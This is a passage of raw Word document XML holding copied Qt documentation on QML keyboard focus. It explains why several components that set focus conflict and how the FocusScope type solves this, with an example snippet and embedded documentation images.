            <v:imagedata r:id="rId2246" r:href="rId2247"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00C62FB3">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Looking at both</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MyWidget</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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window</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">code, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>problem is evident - there are three types that set the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The two</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MyWidget</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s set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focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</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true</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and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window</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">component also sets the focus. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ultimately, only one type can have keyboard focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and the system has to decide which type receives the focus. When the second</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MyWidget</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is created, it receives the focus because it is the last type to set its</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focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</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true</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This problem is due to visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.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MyWidget</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component would like to have the focus, but it cannot control the focus when it is imported or reused</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Likewise</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,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window</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component does not have the ability to know if its imported components are requesting the focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To solve this problem, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML introduces a concept known as a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus scope</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For existing </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt users</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus scope is like an automatic focus proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A focus scope is created by declaring the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2248" w:history="1">
        <w:r w:rsidRPr="00C62FB3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the next </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2249" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type is added to the component, and the visual result shown.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FocusScope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BC6C9E" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//FocusScope needs to bind to visual properties of the Rectangle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property</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alias</w:t>
      </w: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color</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x</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x</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y</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y</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height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height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Rectangle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id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anchors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centerIn</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parent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"lightsteelblue"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175</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height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25</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radius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10</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antialiasing</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Text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id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anchors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centerIn</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parent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focus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Keys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onPressed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Key_A</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A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else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Key_B</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B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else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Key_C</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C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34282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1056" type="#_x0000_t75" alt="" style="width:180.3pt;height:115.2pt">
            <v:imagedata r:id="rId2250" r:href="rId2251"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conceptually</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are quite </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wit</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hin each focus scope one object may have</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item::focus</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set to</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. I</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f more than one</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2252" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property set, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
